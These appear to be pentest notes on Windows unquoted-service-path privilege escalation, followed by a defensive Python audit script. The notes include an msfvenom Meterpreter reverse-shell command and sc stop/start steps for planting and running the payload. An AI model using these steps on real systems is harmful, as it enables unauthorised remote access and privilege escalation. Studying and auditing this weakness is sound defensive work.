Unquoted Service path


  • Check for any service with an unquoted path such as C:\Program Files\My Program\My Service\svice.exe. If the service path is stored unquoted, whenever Windows starts the service it will attempt to run an executable from the following paths, in order:

C:\Program.exe
C:\Program Files\My.exe
C:\Program Files\My Program\My.exe
C:\Program Files\My Program\My service\svice.exe
  • We can put My.exe in My Program if we have write permission. It can be an add-user executable like the one in Binary hijacking / Insecure File permissions.

  • Or we can create a reverse shell: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f exe > My.exe

  • Stop the service: sc stop svice.exe

  • Transfer My.exe into My Program

  • Start the service: sc start svice.exe

  • Now the exploit is successful
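
For auditing, the search order described above can be computed directly from a service's ImagePath string. This is an added example, not part of the original notes: it lists the extra paths Windows would try for an unquoted path and the quoted form that removes them. The sample service entries and all function names are constructed for illustration.

```python
import re
from ntpath import splitext  # Windows path rules, works on any OS

# Constructed sample data: service name -> ImagePath as stored in the registry.
SAMPLE_SERVICES = {
    "svice": r"C:\Program Files\My Program\My Service\svice.exe",
    "quoted": r'"C:\Program Files\Vendor App\agent.exe" --run',
    "nospace": r"C:\Windows\System32\svchost.exe -k netsvcs",
}

def split_image_path(image_path):
    """Return (executable, was_quoted) for an ImagePath string."""
    s = image_path.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return (s[1:end] if end != -1 else s[1:]), True
    # Assumption: the intended binary ends at the first ".exe" followed by
    # whitespace or end of string; otherwise treat the whole string as the path.
    m = re.match(r"(.*?\.exe)(?=\s|$)", s, re.IGNORECASE)
    return (m.group(1) if m else s), False

def hijack_candidates(image_path):
    """Paths Windows tries before the real binary when the path is unquoted."""
    exe, quoted = split_image_path(image_path)
    if quoted:
        return []
    candidates = []
    for i, ch in enumerate(exe):
        if ch == " ":
            prefix = exe[:i]
            # ".exe" is appended when the truncated name has no extension.
            candidates.append(prefix if splitext(prefix)[1] else prefix + ".exe")
    return candidates

def quoted_form(image_path):
    """The same ImagePath with the executable quoted (the fix)."""
    exe, quoted = split_image_path(image_path)
    if quoted:
        return image_path
    return f'"{exe}"{image_path.strip()[len(exe):]}'

def audit(services):
    """Map each at-risk service name to its extra candidate paths."""
    return {n: c for n, p in services.items() if (c := hijack_candidates(p))}

if __name__ == "__main__":
    for name, paths in audit(SAMPLE_SERVICES).items():
        print(name, "->", paths, "| fix:", quoted_form(SAMPLE_SERVICES[name]))
```

A reported candidate only matters where a non-administrative user can write to its parent directory, so review those directory permissions alongside quoting the path.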
